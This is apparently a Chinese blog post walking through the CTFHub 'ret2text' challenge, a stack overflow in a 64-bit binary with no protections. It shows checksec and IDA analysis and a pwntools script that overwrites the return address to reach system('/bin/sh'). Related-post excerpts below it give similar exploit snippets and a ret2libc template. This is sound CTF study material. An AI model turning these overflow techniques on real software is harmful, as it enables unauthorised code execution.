【PWN · ret2text】——[CTFHub]ret2text

原创 已于 2023-05-08 09:03:16 修改 · 3.6k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #ret2text #ctf

于 2023-04-20 17:33:38 首次发布
文章介绍了如何利用一个没有保护措施的64位程序进行栈溢出攻击。首先通过checksec检查程序安全性,发现可利用栈溢出。接着使用IDA反汇编找出危险函数gets()和目标函数secure()。在知道系统调用地址后,编写exp,构造payload覆盖返回地址,最终远程发送payload并获得shell交互,从而能够执行系统命令如ls和catflag来获取信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

萌新第一阶段自然是了解做题的套路、流程,简单题要多做滴

前言

经典的ret2text流程 

一、checksec查看

 64位程序,什么保护都没有,No canary found——可以栈溢出控制返回

二、IDA反汇编

发现危险函数gets()

 发现存在返回shell的函数secure(),虽然有一系列随机数啦,随机数比较之类的前置判断,不用管他,只要我们溢出返回地址直接指向目标指令的地址就可以成功获取shell

v大小为0x70+栈基指针0x8+返回地址 

 返回哪里呢?直接返回system("/bin/sh")指令的地址。

三、exp编写 

from pwn import *

r=remote('网址',port)

addr=0x4007B8                        #system("/bin/shell")指令地址
payload=b'a'*(0x70+0x8)+p64(addr)    #覆盖v存储、覆盖栈基指针、修改返回地址

r.sendline(payload)                  #发送payload

r.interactive()                      #shell 交互

 然后ls查看有哪些文件,cat flag即可获得flag

总结

蒟蒻在行动!

[SWPUCTF 2024 秋季新生赛]不是哥们ret2text还阴啊?
Welcome To Myon'Blog !
05-26 225
通过分析栈结构发现缓冲区溢出漏洞,其中v1[56]数组可被覆盖。利用逐字节读取特性,先覆盖60字节数据至i变量地址,将其设为0x47。随后继续写入8字节至返回地址处(rbp+8),劫持为后门函数地址0x4011F1。最终成功获取flag:NSSCTF{7256ca63-a417-4a2d-9eb9-49ff78eb65d0}。
入门pwn题目ret2text
03-26
入门pwn题目ret2text
CTF pwn方向 ret2text 总结和例题
qq_20242529的博客
05-21 800
这里用命令:ROPgadget --binary filename --only "pop|ret"这里有system(“/bin/sh”),要将主函数跳带这里就能拿shell。padding=0X9+4 这里的4是因为32位。找system函数。以Polar靶场的小狗汪汪汪为例子。因为是64所以要找rdi的地址。复制getshell的地址。以Polar靶场的x64为例。找bin/sh.或者$0等。这里有危险函数gets。
ret2text
Power_shell的博客
03-25 520
Shellcode可以放到bss段然后去执行我们的shell可以控制好几段位置不相邻的代码(gadgets),用rop技术 随着nx保护技术的开启,往堆栈写代码的方式已经发挥不了效果 Rop:Return-oriented Programming(面向返回的编程) 在缓冲区溢出的基础上利用程序已有的小片段,来改变我们程序寄存器变量的值,从而达到控制程序执行流程的效果 所以gadgets是以ret...
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1382
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭
CTFHUB(PWN)Ret2Text
Rt1Text的博客
02-02 4414
64位没有开启任何保护的Ret2Text
[CTFHub] ret2text
Lucien_Carr的博客
04-14 987
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。输入超过程序设定的字节数以后,就会发生栈溢出,多出的内容会覆盖返回地址。这个题目中要获得系统的shell,只需要先用垃圾数据填充填满数组的空间,再拼上系统system函数的返回地址就可以。只要我们能控制程序返回到0x4007B8(“/bin/sh”指令的地址),就可以得到系统的shell。我们攻击的目的主要是获得系统的控制权(也就是拿到shell)。
CTFhub-pwn-[ret2text]-writeup
m0_43405474的博客
08-26 2062
关于CTF pwn的简单入门题目,ret2text
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 992
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
[CTFHub]ret2text-入土为安的第十二天
lzx13290757580的博客
08-01 266
ida fn+ F5 main 点(_int64)v4。v大小为0x70+栈基指针0x8+返回地址。
[PWN] CTF-WIKI ret2text
qq_46441427的博客
02-06 612
ret2text 首先我们打开题目,checksec一下,主要是查看一下该程序是多少位的,并了解其保护机制 32位的小端位程序,没有开启canary堆栈保护及NX,于是我们用32位ida打开 我们打开ida-32,看到源码,发现了一个get函数,这属于我们常说的危险函数 在函数框,我们找到了一个secure函数,调出来,发现有一个system("/bin/sh")函数 这个时候,我们只需要知道调用system函数的指令的地址,然后当get函数执行时我们把get函数的ret上准备ret的地址换成调用syst
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 1040
CTF-wiki的注解:ret2shellcode
CTFhub 技能树 PWN ret2text Python3 exp
break_cat的博客
11-17 1261
题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。 from pwn import * h
CTFHub 栈溢出 ret2text exp代码
柠檬i的博客
10-09 2031
CTFHub 栈溢出 ret2text exp代码
CTFHUB-PWN-ret2text
m0_64180167的博客
04-16 203
然后我们可以开始写payload。下载文件 checksec看看。然后看看shell的地址是多少。放入ida64 查看字符串。然后看看主函数怎么输入。
pwn ret2text
小龙在线
09-12 769
首先把ret2text用IDA打开: 64位ELF文件。 进入main函数,F5反编译,双击vulnerable函数,进入: 发现溢出点。 函数窗口列表,查看success,发现shell: 进入IDA普通视图,双击左侧success函数,查看success地址,是400566。 写pwn exp.py: from pwn import * sh = process("./ret2text") payload = b"a"*0x10 + b"b"*0x8 + p64(0x400566) sh.
PWN基础8:Ret2Text 实例
prettyX的博客
07-12 578
基础知识 1、栈溢出快速确定偏移量: pwndbg cyclic 200 cyclic -l 异常地址 peda pattern create 200 pattern offset 异常地址 2、定位system函数 objdump -t XXX 查看程序中使用到的函数 objdump -d XXX 查看程序中函数的汇编代码 objdump -d -M intel XXX 查看程序中函数的汇编代码,并且汇编代码是intel架构的
CTFhub-pwn-[ret2shellcode]
m0_43405474的博客
08-26 1846
CTFpwn的一个关于ret2shellcode的小练习,来自CTFhub
ctf wiki pwn ret2libc
最新发布
03-01
### CTF PWN Ret2libc 攻击教程与实例 Ret2libc是一种利用栈溢出漏洞的技术,在这种技术下,攻击者通过覆盖返回地址来调用系统中的现有函数(通常是`system()`),从而执行任意命令。当面对静态链接的二进制文件时,由于其缺少GOT/PLT表,“xxx is statically linked, skipping GOT/PLT symbols”的提示表明无法从这些地方获取库函数地址[^1]。 对于动态链接的目标而言,可以通过操纵堆栈指针指向目标函数的实际位置实现ret2libc攻击;而对于静态编译的情况,则可以直接在`.text`段内寻找所需的函数入口点并加以利用。 下面是一个简单的Python脚本用于演示如何实施ret2libc攻击: ```python from pwn import * # 设置远程连接参数 host = 'example.com' port = 9999 # 连接到服务端 conn = remote(host, port) # 假设已知偏移量为offset=108字节,并且存在可以控制的数据位于该处之后 offset = 108 # 获取/bin/sh字符串的位置以及system()函数的真实地址 bin_sh_addr = 0xdeadbeef # 需要替换为实际地址 system_addr = 0xbadc0de # 同上 payload = b'A' * offset + pack(system_addr) + b'JUNK' + pack(bin_sh_addr) # 发送载荷给服务器 conn.sendline(payload) # 切换到交互模式以便观察后续操作结果 conn.interactive() ``` 此代码片段展示了发送精心构造的有效负载至易受攻击的服务的过程,其中包含了必要的填充字符、system()函数地址及其参数"/bin/sh"所在内存区域的指针值。需要注意的是上述示例中使用的具体数值应当依据实际情况调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值